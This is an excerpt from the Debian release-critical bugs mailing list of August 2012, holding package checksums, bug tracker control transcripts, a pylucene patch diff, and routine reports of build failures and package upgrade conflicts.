   * Update zeoslibs to suport libmysqlclient.so.18
   * Update all to compile whit new version of lazarus 0.9.30-4 and 1.1rc
Checksums-Sha1: 
 0cf45f227fab6d259d113ff0b7de4b56cf0ae916 1833 facturlinex2_2.2.2-2.dsc
 aaf58216ac103900898980b11af1a3725bae576a 11469307 
facturlinex2_2.2.2.orig.tar.gz
 550e9734f16998394df08850d70112141fa6c5dc 4044 
facturlinex2_2.2.2-2.debian.tar.gz
 277733dd4ac164115baff9f4f26e591d0a615b51 6220646 facturlinex2_2.2.2-2_i386.deb
Checksums-Sha256: 
 a8bfd12bd1f530bba029e788701407ac2472b1378523f57079a706efcc2c180c 1833 
facturlinex2_2.2.2-2.dsc
 78f7b6f9ccca71d45e289ebd421a256556d5a6f349c6ceb3d579ca7b868626bb 11469307 
facturlinex2_2.2.2.orig.tar.gz
 724e54f507fb72b3f9a8997d20023706eb6ebc58d7cc59b527343141a0570b79 4044 
facturlinex2_2.2.2-2.debian.tar.gz
 3457e148134d098fcc3601cfae74b05690da3abf3dd18cae03ea6117609fc182 6220646 
facturlinex2_2.2.2-2_i386.deb
Files: 
 514f6727f732bff589045dcba3c09b62 1833 x11 optional facturlinex2_2.2.2-2.dsc
 e0a83e1bb2f46f60157036907d13ece3 11469307 x11 optional 
facturlinex2_2.2.2.orig.tar.gz
 82d4be77e8547c9606d5b7e484e6188d 4044 x11 optional 
facturlinex2_2.2.2-2.debian.tar.gz
 5925b9ecfb76c5f4492841182fbac760 6220646 x11 optional 
facturlinex2_2.2.2-2_i386.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.12 (GNU/Linux)

iQIcBAEBCAAGBQJQH5KbAAoJEPjp6tWiJ9yS6C4P/jCv5gEzDmmjkGlzE8YIrTuX
tZFXR/otGznz2PqQVAcn2/VRhW22FQy0uSPxwtBGt2amJB3IbVxcSKccQsyNXpQY
ZAFLxPUjcs86wVed7bBR6Mf/D7WQXA1qbvKhGWhwZIXZ7KeY30Tt7f+LrqvRCYZK
NF754Y8e2TDDv6/LU73WsGsDwjrRBms4fz4Ys5yFDQ+ElgK4tHWEA25ctd9AYPtA
87uRAdI7v/KZu38SFkFuK8MPH2YfPEDXbrMzPjKTQiQ4dD8DyH8dEuIIL4jzspzt
rQGcfdrCd7UCktTWWkITNk+3JKEGE5cOOr9SP+83j/crIqaph7TPUcAAOPGig5Wb
J/Ja1ogmTAdVWUMI5/Wr9ao/yRgrfb9iCLG4HpmTya4WZ2zk9jRGjbRmYPl4w4Nb

Processed: pylucene: diff for NMU version 3.5.0-1.1

2012-08-06 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 tags 679368 + patch pending
Bug #679368 [src:pylucene] pylucene: FTBFS python class name already in use
Added tag(s) pending and patch.
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
679368: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=679368
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#679368: pylucene: diff for NMU version 3.5.0-1.1

2012-08-06 Thread Luca Falavigna
tags 679368 + patch pending
thanks


Dear maintainer,

I've prepared an NMU for pylucene (versioned as 3.5.0-1.1) and
uploaded it to DELAYED/2. Please feel free to tell me if I
should delay it longer.

Regards.
diff -Nru pylucene-3.5.0/debian/changelog pylucene-3.5.0/debian/changelog
--- pylucene-3.5.0/debian/changelog	2012-04-24 00:12:29.0 +0200
+++ pylucene-3.5.0/debian/changelog	2012-08-06 11:44:58.0 +0200
@@ -1,3 +1,12 @@
+pylucene (3.5.0-1.1) unstable; urgency=medium
+
+  * Non-maintainer upload.
+  * debian/patches/unique_classes.patch:
+- Cherry-pick patch from upstream branch_3x SVN (r1240640) to rename
+  classes whose python name would not be unique (Closes: #679368).
+
+ -- Luca Falavigna dktrkr...@debian.org  Mon, 06 Aug 2012 11:43:34 +0200
+
 pylucene (3.5.0-1) unstable; urgency=low
 
   * New maintainer (closes: 670179)
diff -Nru pylucene-3.5.0/debian/patches/series pylucene-3.5.0/debian/patches/series
--- pylucene-3.5.0/debian/patches/series	2012-04-23 18:29:49.0 +0200
+++ pylucene-3.5.0/debian/patches/series	2012-08-06 11:45:25.0 +0200
@@ -0,0 +1 @@
+unique_classes.patch
diff -Nru pylucene-3.5.0/debian/patches/unique_classes.patch pylucene-3.5.0/debian/patches/unique_classes.patch
--- pylucene-3.5.0/debian/patches/unique_classes.patch	1970-01-01 01:00:00.0 +0100
+++ pylucene-3.5.0/debian/patches/unique_classes.patch	2012-08-06 11:43:24.0 +0200
@@ -0,0 +1,31 @@
+Description: rename classes whose python name would not be unique in lucene module
+Origin: http://svn.apache.org/repos/asf/lucene/pylucene/branches/branch_3x/Makefile
+
+Index: pylucene-3.5.0/Makefile
+===
+--- pylucene-3.5.0.orig/Makefile	2011-12-09 06:17:55.0 +0100
 pylucene-3.5.0/Makefile	2012-08-06 11:38:31.042902706 +0200
+@@ -288,6 +288,7 @@
+--exclude org.apache.lucene.queryParser.TokenMgrError \
+--exclude org.apache.lucene.queryParser.QueryParserTokenManager \
+--exclude org.apache.lucene.queryParser.ParseException \
++   --exclude org.apache.lucene.queryParser.CharStream \
+--exclude org.apache.lucene.search.regex.JakartaRegexpCapabilities \
+--exclude org.apache.regexp.RegexpTunnel \
+--exclude org.apache.lucene.analysis.cn.smart.AnalyzerProfile \
+@@ -296,6 +297,15 @@
+--mapping java.util.Properties 'getProperty:(Ljava/lang/String;)Ljava/lang/String;' \
+--sequence java.util.AbstractList 'size:()I' 'get:(I)Ljava/lang/Object;' \
+--rename org.apache.lucene.search.highlight.SpanScorer=HighlighterSpanScorer \
++   --rename org.apache.lucene.search.highlight.Scorer=HighlighterScorer \
++   --rename org.apache.lucene.search.spell.Dictionary=SpellDictionary \
++   --rename org.apache.lucene.search.suggest.fst.Sort=SuggestSort \
++   --rename org.apache.lucene.store.DataInput=StoreDataInput \
++   --rename org.apache.lucene.store.DataOutput=StoreDataOutput \
++   --rename org.tartarus.snowball.ext.DutchStemmer=SnowballDutchStemmer \
++   --rename org.tartarus.snowball.ext.FrenchStemmer=SnowballFrenchStemmer \
++   --rename org.tartarus.snowball.ext.GermanStemmer=SnowballGermanStemmer \
++   --rename org.tartarus.snowball.ext.PortugueseStemmer=SnowballPortugueseStemmer \
+--version $(LUCENE_VER) \
+--module python/collections.py \
+--module python/ICUNormalizer2Filter.py \


Processed: unarchiving 647407, found 647407 in youtube-dl/2012.02.27+gita171dbf-1

2012-08-06 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 unarchive 647407
Bug #647407 {Done: Rogério Brito rbr...@ime.usp.br} [youtube-dl] youtube-dl: 
FTBFS: /usr/bin/env: python: No such file or directory
Unarchived Bug 647407
 found 647407 youtube-dl/2012.02.27+gita171dbf-1
Bug #647407 {Done: Rogério Brito rbr...@ime.usp.br} [youtube-dl] youtube-dl: 
FTBFS: /usr/bin/env: python: No such file or directory
Marked as found in versions youtube-dl/2012.02.27+gita171dbf-1 and reopened.
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
647407: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=647407
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#668721: Any reason to not upload the patched package to close #668721

2012-08-06 Thread Andreas Tille
Hi Joey,

following the advise to look into RC bugs before reading Bits from DPL
I stumbled over this one.  Could you give any reason why you do not
upload with the provided patch?

Please give some signal what to do (I'd volunteer to NMU in case you
might have some time issues).

Kind regards

Andreas.

-- 
http://fam-tille.de


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#684019: python-liblcms: static library in /usr/share

2012-08-06 Thread Jakub Wilk

Package: python-liblcms
Version: 1.19.dfsg-1.1
Severity: serious
Justification: Policy 9.1.1

$ dpkg -c python-liblcms_1.19.dfsg-1.1_i386.deb | grep -F .a
-rw-r--r-- root/root   2654720 2012-05-20 20:05 ./usr/share/pyshared/_lcms.a
lrwxrwxrwx root/root 0 2012-05-20 20:05 
./usr/lib/python2.7/dist-packages/_lcms.a - ../../../share/pyshared/_lcms.a

I suppose this file shouldn't be included in the binary package at all: 
there's no way Python could use the static library.


--
Jakub Wilk


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#684024: python-adodb: broken binary-indep target

2012-08-06 Thread Jakub Wilk

Source: python-adodb
Version: 2.10-1
Severity: serious
Justification: Policy 4.9

python-adodb builds an arch:all package, but if you try to build it with 
dpkg-buildpackage -A, it FTBFS with:

|  dpkg-genchanges -A ../python-adodb_2.10-1_all.changes
| dpkg-genchanges: arch-indep upload - not including arch-specific packages
| dpkg-genchanges: error: cannot read files list file: No such file or directory
| dpkg-buildpackage: error: dpkg-genchanges gave error exit status 2

--
Jakub Wilk


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#683998: [Packaging] Bug#683998: munin: allows creation of sockets at arbitrary locations (/tmp file vulnerability)

2012-08-06 Thread Holger Levsen
On Montag, 6. August 2012, Helmut Grohne wrote:
 Control: fixed 683998 2.0.1-1
 Control: tags 683998 + patch

ack + thanks.

expect an upload soon.


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#683576: epiphany-browser: No option available to delete/clear cookies

2012-08-06 Thread sat...@gmail.com

 Nope, when you'll launch epiphany, its menu will be available on the top
 GNOME Shell bar (with the new brand: 'Web'), click on it and you'll find
 the 'Personal Data' menu section.


Works fine, Thanks Vincent!!
-- 
Satheesh Kumar Mohan


Bug#683576: epiphany-browser: No option available to delete/clear cookies

2012-08-06 Thread Vincent Blut
Le 06/08/2012 12:53, sat...@gmail.com a écrit :

 Nope, when you'll launch epiphany, its menu will be available on
 the top GNOME Shell bar (with the new brand: 'Web'), click on it
 and you'll find the 'Personal Data' menu section.


 Works fine, Thanks Vincent!!
 -- 
 Satheesh Kumar Mohan


You're welcome ;-)

Regards,
Vincent


Bug#647407: youtube-dl: FTBFS: /usr/bin/env: python: No such file or directory

2012-08-06 Thread Felix Geyer
This build failure occurs again in 2012.02.27+gita171dbf-1
and -2.


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#684030: libctl5: fails to upgrade from 'sid' - trying to overwrite /usr/share/libctl/utils/geom.c

2012-08-06 Thread Andreas Beckmann
Package: libctl5
Version: 3.2-1
Severity: serious
User: debian...@lists.debian.org
Usertags: piuparts

Hi,

during a test with piuparts I noticed your package fails to upgrade from
'sid' to 'experimental'.
It installed fine in 'sid', then the upgrade to 'experimental' fails
because it tries to overwrite other packages files without declaring a
Breaks/Replaces relation.

See policy 7.6 at
http://www.debian.org/doc/debian-policy/ch-relationships.html#s-replaces

From the attached log (scroll to the bottom...):

  Selecting previously unselected package libctl5.
  Unpacking libctl5 (from .../libctl5_3.2-1_amd64.deb) ...
  dpkg: error processing /var/cache/apt/archives/libctl5_3.2-1_amd64.deb 
(--unpack):
   trying to overwrite '/usr/share/libctl/utils/geom.c', which is also in 
package libctl3 3.1.0-5
  dpkg-deb: error: subprocess paste was killed by signal (Broken pipe)


cheers,

Andreas


libctl-dev_3.2-1.log.gz
Description: GNU Zip compressed data


Bug#684031: ocaml-compiler-libs: fails to upgrade from 'sid' - trying to overwrite /usr/lib/ocaml/topdirs.cmi

2012-08-06 Thread Andreas Beckmann
Package: ocaml-compiler-libs
Version: 4.00.0-1
Severity: serious
User: debian...@lists.debian.org
Usertags: piuparts

Hi,

during a test with piuparts I noticed your package fails to upgrade from
'sid' to 'experimental'.
It installed fine in 'sid', then the upgrade to 'experimental' fails
because it tries to overwrite other packages files without declaring a
Breaks/Replaces relation.

See policy 7.6 at
http://www.debian.org/doc/debian-policy/ch-relationships.html#s-replaces

From the attached log (scroll to the bottom...):

  Selecting previously unselected package ocaml-compiler-libs.
  Unpacking ocaml-compiler-libs (from 
.../ocaml-compiler-libs_4.00.0-1_amd64.deb) ...
  dpkg: error processing 
/var/cache/apt/archives/ocaml-compiler-libs_4.00.0-1_amd64.deb (--unpack):
   trying to overwrite '/usr/lib/ocaml/topdirs.cmi', which is also in package 
ocaml-base-nox 3.12.1-4


cheers,


Andreas


ocaml-interp_4.00.0-1.log.gz
Description: GNU Zip compressed data


Bug#684032: libpinyin2: fails to upgrade from 'sid' - trying to overwrite /usr/lib/x86_64-linux-gnu/libpinyin/data/pinyin_index.bin

2012-08-06 Thread Andreas Beckmann
Package: libpinyin2
Version: 0.7.0-1
Severity: serious
User: debian...@lists.debian.org
Usertags: piuparts

Hi,

during a test with piuparts I noticed your package fails to upgrade from
'sid' to 'experimental'.
It installed fine in 'sid', then the upgrade to 'experimental' fails
because it tries to overwrite other packages files without declaring a
Breaks/Replaces relation.

See policy 7.6 at
http://www.debian.org/doc/debian-policy/ch-relationships.html#s-replaces

From the attached log (scroll to the bottom...):

  Selecting previously unselected package libpinyin2:amd64.
  Unpacking libpinyin2:amd64 (from .../libpinyin2_0.7.0-1_amd64.deb) ...
  dpkg: error processing /var/cache/apt/archives/libpinyin2_0.7.0-1_amd64.deb 
(--unpack):
   trying to overwrite 
'/usr/lib/x86_64-linux-gnu/libpinyin/data/pinyin_index.bin', which is also in 
package libpinyin0:amd64 0.6.91-1
  dpkg-deb: error: subprocess paste was killed by signal (Broken pipe)


cheers,

Andreas


fcitx-libpinyin_0.2.0-1.log.gz
Description: GNU Zip compressed data


Bug#683919: marked as done (Can't use the final version of opus)

2012-08-06 Thread Debian Bug Tracking System
Your message dated Mon, 06 Aug 2012 11:32:15 +
with message-id e1sylxj-fg...@franck.debian.org
and subject line Bug#683919: fixed in gst-plugins-bad0.10 0.10.23-7
has caused the Debian Bug report #683919,
regarding Can't use the final version of opus
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
683919: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=683919
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---
Package: gstreamer0.10-plugins-bad
Version: 0.10.23-6
Severity: grave
Tags: upstream

The Opus codec has been finalized recently, unfortunately the version of the
opus plugin in Debian wasn't updated yet with the latest changes (although it
has been fixed upstream). Using the final version of opus with the gstreamer
opus plugin in debian makes Gstreamer crash or fail. This means that as it
stands the opus plugin as shipped by gstreamer is useless to all user and
should either be removed or fixed.


-- System Information:
Debian Release: wheezy/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (500, 'testing'), (500, 'stable'), (101, 
'experimental')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 3.5-trunk-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_GB.utf8, LC_CTYPE=en_GB.utf8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages gstreamer0.10-plugins-bad depends on:
ii  dconf-gsettings-backend [gsettings-backend]  0.12.1-2
ii  gconf-gsettings-backend [gsettings-backend]  3.2.5-1
ii  gstreamer0.10-plugins-base   0.10.36-1co1
ii  libass4  0.10.0-3
ii  libbz2-1.0   1.0.6-4
ii  libc62.13-35
ii  libcairo21.12.2-2
ii  libcdaudio1  0.99.12p2-12
ii  libcurl3-gnutls  7.26.0-1
ii  libdc1394-22 2.2.0-2
ii  libdca0  0.0.5-5
ii  libdirac-encoder01.0.2-6
ii  libdirectfb-1.2-91.2.10.0-5
ii  libdvdnav4   4.2.0+20120524-2
ii  libdvdread4  4.2.0+20120521-2
ii  libfaad2 2.7-8
ii  libflite11.4-release-5
ii  libgcc1  1:4.7.1-6
ii  libglib2.0-0 2.32.3-1
ii  libgme0  0.5.5-2
ii  libgsm1  1.0.13-4
ii  libgstreamer-plugins-bad0.10-0   0.10.23-6
ii  libgstreamer-plugins-base0.10-0  0.10.36-1co1
ii  libgstreamer0.10-0   0.10.36-1
ii  libjasper1   1.900.1-13
ii  libkate1 0.4.1-1
ii  libmimic01.0.4-2.1
ii  libmms0  0.6.2-3
ii  libmodplug1  1:0.8.8.4-3
ii  libmpcdec6   2:0.1~r459-4
ii  libofa0  0.9.3-5
ii  libopenal1   1:1.14-4
ii  libopus0 0.9.14+20120615-1
ii  liborc-0.4-0 1:0.4.16-2
ii  libpng12-0   1.2.49-2
ii  librsvg2-2   2.36.1-1
ii  librtmp0 2.4+20111222.git4e06e21-1
ii  libschroedinger-1.0-01.0.11-2
ii  libslv2-90.6.6+dfsg1-2
ii  libsndfile1  1.0.25-5
ii  libsoundtouch0   1.6.0-3
ii  libspandsp2  0.0.6~pre20-3
ii  libssl1.0.0  1.0.1c-4
ii  libstdc++6   4.7.1-6
ii  libvo-aacenc00.1.2-1
ii  libvo-amrwbenc0  0.1.2-1
ii  libvpx1  1.1.0-1
ii  libwildmidi1 0.2.3.4-2.1
ii  libx11-6 2:1.5.0-1
ii  libxml2  2.8.0+dfsg1-5
ii  libxvidcore4 2:1.3.2-9
ii  libzbar0 0.10+doc-7+b2
ii  libzvbi0 0.2.33-6
ii  multiarch-support2.13-35


Processed (with 1 errors): Re: Bug#680060: Linux guests shut off early in boot process

2012-08-06 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 severity 680060 serious
Bug #680060 [qemu-kvm] Linux guests shut off early in boot process
Severity set to 'serious' from 'important'
 fixed 680060 1.1.0+dfsg-1
Bug #680060 [qemu-kvm] Linux guests shut off early in boot process
Marked as fixed in versions qemu-kvm/1.1.0+dfsg-1.
 unarchive 679788
Bug #679788 {Done: Michael Tokarev m...@tls.msk.ru} [qemu-kvm] kvm-1.0 
segfaults with -M pc-1.0 (and older) and vhost-net
Bug #680460 {Done: Michael Tokarev m...@tls.msk.ru} [qemu-kvm] KVM crashes 
with segfault error for kernel linux-3.4.4 AMD64
Bug #680508 {Done: Michael Tokarev m...@tls.msk.ru} [qemu-kvm] /usr/bin/kvm: 
segfault at 10 ip 7fed4d3bf78e sp 7fed3e364990 error 4 in 
kvm[7fed4d26+381000]
Unarchived Bug 679788
Unarchived Bug 680460
Unarchived Bug 680508
 merge 679788 680060
Bug #679788 {Done: Michael Tokarev m...@tls.msk.ru} [qemu-kvm] kvm-1.0 
segfaults with -M pc-1.0 (and older) and vhost-net
Bug #680460 {Done: Michael Tokarev m...@tls.msk.ru} [qemu-kvm] KVM crashes 
with segfault error for kernel linux-3.4.4 AMD64
Bug #680508 {Done: Michael Tokarev m...@tls.msk.ru} [qemu-kvm] /usr/bin/kvm: 
segfault at 10 ip 7fed4d3bf78e sp 7fed3e364990 error 4 in 
kvm[7fed4d26+381000]
Unable to merge bugs because:
forwarded of #680060 is '' not 'http://www.spinics.net/lists/kvm/msg75053.html'
done of #680060 is '' not 'Michael Tokarev m...@tls.msk.ru'
Failed to merge 679788: Did not alter merged bugs
Debbugs::Control::set_merged('transcript', 'GLOB(0x1cd45a8)', 
'requester', 'Michael Tokarev m...@tls.msk.ru', 'request_addr', 
'cont...@bugs.debian.org', 'request_msgid', 
'501fab5d.5060...@msgid.tls.msk.ru', 'request_subject', ...) called at 
/usr/local/lib/site_perl/Debbugs/Control/Service.pm line 537
eval {...} called at 
/usr/local/lib/site_perl/Debbugs/Control/Service.pm line 536
Debbugs::Control::Service::control_line('line', 'merge 679788 680060', 
'clonebugs', 'HASH(0x1c4d9e8)', 'limit', 'HASH(0x1c4d430)', 
'common_control_options', 'ARRAY(0x1c4d478)', 'errors', ...) called at 
/usr/lib/debbugs/service line 471

 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
679788: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=679788
680060: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=680060
680460: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=680460
680508: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=680508
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed (with 2 errors): Re: Processed (with 1 errors): Re: Bug#680060: Linux guests shut off early in boot process

2012-08-06 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 forwarded 680060 http://www.spinics.net/lists/kvm/msg75053.html
Bug #680060 [qemu-kvm] Linux guests shut off early in boot process
Set Bug forwarded-to-address to 
'http://www.spinics.net/lists/kvm/msg75053.html'.
 done 680060 Michael Tokarev m...@tls.msk.ru
 merge 679788 680060
Bug #679788 {Done: Michael Tokarev m...@tls.msk.ru} [qemu-kvm] kvm-1.0 
segfaults with -M pc-1.0 (and older) and vhost-net
Bug #680460 {Done: Michael Tokarev m...@tls.msk.ru} [qemu-kvm] KVM crashes 
with segfault error for kernel linux-3.4.4 AMD64
Bug #680508 {Done: Michael Tokarev m...@tls.msk.ru} [qemu-kvm] /usr/bin/kvm: 
segfault at 10 ip 7fed4d3bf78e sp 7fed3e364990 error 4 in 
kvm[7fed4d26+381000]
Unable to merge bugs because:
done of #680060 is '' not 'Michael Tokarev m...@tls.msk.ru'
Failed to merge 679788: Did not alter merged bugs
Debbugs::Control::set_merged('transcript', 'GLOB(0x197d440)', 
'requester', 'Michael Tokarev m...@tls.msk.ru', 'request_addr', 
'cont...@bugs.debian.org', 'request_msgid', 
'501fac28.4090...@msgid.tls.msk.ru', 'request_subject', ...) called at 
/usr/local/lib/site_perl/Debbugs/Control/Service.pm line 537
eval {...} called at 
/usr/local/lib/site_perl/Debbugs/Control/Service.pm line 536
Debbugs::Control::Service::control_line('line', 'merge 679788 680060', 
'clonebugs', 'HASH(0x18f69e8)', 'limit', 'HASH(0x18f6430)', 
'common_control_options', 'ARRAY(0x18f6478)', 'errors', ...) called at 
/usr/lib/debbugs/service line 471

 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
679788: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=679788
680060: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=680060
680460: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=680460
680508: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=680508
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: #680060 #4

2012-08-06 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 forcemerge 679788 680060
Bug #679788 {Done: Michael Tokarev m...@tls.msk.ru} [qemu-kvm] kvm-1.0 
segfaults with -M pc-1.0 (and older) and vhost-net
Bug #680460 {Done: Michael Tokarev m...@tls.msk.ru} [qemu-kvm] KVM crashes 
with segfault error for kernel linux-3.4.4 AMD64
Bug #680508 {Done: Michael Tokarev m...@tls.msk.ru} [qemu-kvm] /usr/bin/kvm: 
segfault at 10 ip 7fed4d3bf78e sp 7fed3e364990 error 4 in 
kvm[7fed4d26+381000]
Bug #679788 {Done: Michael Tokarev m...@tls.msk.ru} [qemu-kvm] kvm-1.0 
segfaults with -M pc-1.0 (and older) and vhost-net
Added tag(s) moreinfo.
Added tag(s) moreinfo.
Added tag(s) moreinfo.
Bug #680060 [qemu-kvm] Linux guests shut off early in boot process
Marked Bug as done
Added tag(s) upstream.
Bug #680460 {Done: Michael Tokarev m...@tls.msk.ru} [qemu-kvm] KVM crashes 
with segfault error for kernel linux-3.4.4 AMD64
Bug #680508 {Done: Michael Tokarev m...@tls.msk.ru} [qemu-kvm] /usr/bin/kvm: 
segfault at 10 ip 7fed4d3bf78e sp 7fed3e364990 error 4 in 
kvm[7fed4d26+381000]
Merged 679788 680060 680460 680508
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
679788: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=679788
680060: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=680060
680460: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=680460
680508: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=680508
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#647407: youtube-dl: FTBFS: /usr/bin/env: python: No such file or directory

2012-08-06 Thread Rogério Brito
On Aug 06 2012, Felix Geyer wrote:
 This build failure occurs again in 2012.02.27+gita171dbf-1
 and -2.

Can you provide some details more, please? At what step does it fail with
the message above?

Thanks,

-- 
Rogério Brito : rbrito@{ime.usp.br,gmail.com} : GPG key 4096R/BCFC
http://rb.doesntexist.org/blog : Projects : https://github.com/rbrito/
DebianQA: http://qa.debian.org/developer.php?login=rbrito%40ime.usp.br


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#680060: Linux guests shut off early in boot process

2012-08-06 Thread Michael Tokarev
severity 680060 serious
fixed 680060 1.1.0+dfsg-1
unarchive 679788
merge 679788 680060
thanks


No reply for more than a month, assuming the initial guess was right,
and mergeing with 679788.

/mjt


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: your mail

2012-08-06 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 tags 678249 -pending
Bug #678249 [mame] mame: Segfaults after upgrading to v0.146
Removed tag(s) pending.

End of message, stopping processing here.

Please contact me if you need assistance.
-- 
678249: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=678249
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: #680060 #5

2012-08-06 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 tags 680060 - moreinfo
Bug #680060 {Done: Michael Tokarev m...@tls.msk.ru} [qemu-kvm] Linux guests 
shut off early in boot process
Bug #679788 {Done: Michael Tokarev m...@tls.msk.ru} [qemu-kvm] kvm-1.0 
segfaults with -M pc-1.0 (and older) and vhost-net
Bug #680460 {Done: Michael Tokarev m...@tls.msk.ru} [qemu-kvm] KVM crashes 
with segfault error for kernel linux-3.4.4 AMD64
Bug #680508 {Done: Michael Tokarev m...@tls.msk.ru} [qemu-kvm] /usr/bin/kvm: 
segfault at 10 ip 7fed4d3bf78e sp 7fed3e364990 error 4 in 
kvm[7fed4d26+381000]
Removed tag(s) moreinfo.
Removed tag(s) moreinfo.
Removed tag(s) moreinfo.
Removed tag(s) moreinfo.
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
679788: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=679788
680060: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=680060
680460: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=680460
680508: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=680508
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#647407: youtube-dl: FTBFS: /usr/bin/env: python: No such file or directory

2012-08-06 Thread Felix Geyer
On 06.08.2012 13:38, Rogério Brito wrote:
 On Aug 06 2012, Felix Geyer wrote:
 This build failure occurs again in 2012.02.27+gita171dbf-1
 and -2.
 
 Can you provide some details more, please? At what step does it fail with
 the message above?


Basically the same as the original report:

dh_auto_build
 make[1]: Entering directory `/tmp/buildd/youtube-dl-2012.02.27+gita171dbf'
 zip --quiet --junk-paths youtube-dl youtube_dl/*.py
 echo '#!/usr/bin/env python'  youtube-dl
 cat youtube-dl.zip  youtube-dl
 rm youtube-dl.zip
 /usr/bin/env: python: No such file or directory
 ./youtube-dl.dev --version  LATEST_VERSION
 /usr/bin/env: python: No such file or directory
 make[1]: *** [update-latest] Error 127
 make[1]: Leaving directory `/tmp/buildd/youtube-dl-2012.02.27+gita171dbf'


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#683993: sweethome3d crashes with java-6-openjdk-amd64, works with java-6-sun

2012-08-06 Thread Gabriele Giacone
On 08/06/2012 08:15 AM, Richard Scherping wrote:
 # Problematic frame:
 # C  [libGL.so.1+0x1ed13]  glXGetFBConfigs+0x53
 #
 # An error report file with more information is saved as:
 # /tmp/hs_err_pid2717.log

1/ Please attach hs_err_pid.log file produced and glxinfo output.

2/ Try openjdk-7.

$ sudo apt-get install openjdk-7-jre
$ sudo update-java-alternatives --jre -s java-1.7.0-openjdk-amd64


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#683274: marked as done (CVE-2012-2688)

2012-08-06 Thread Debian Bug Tracking System
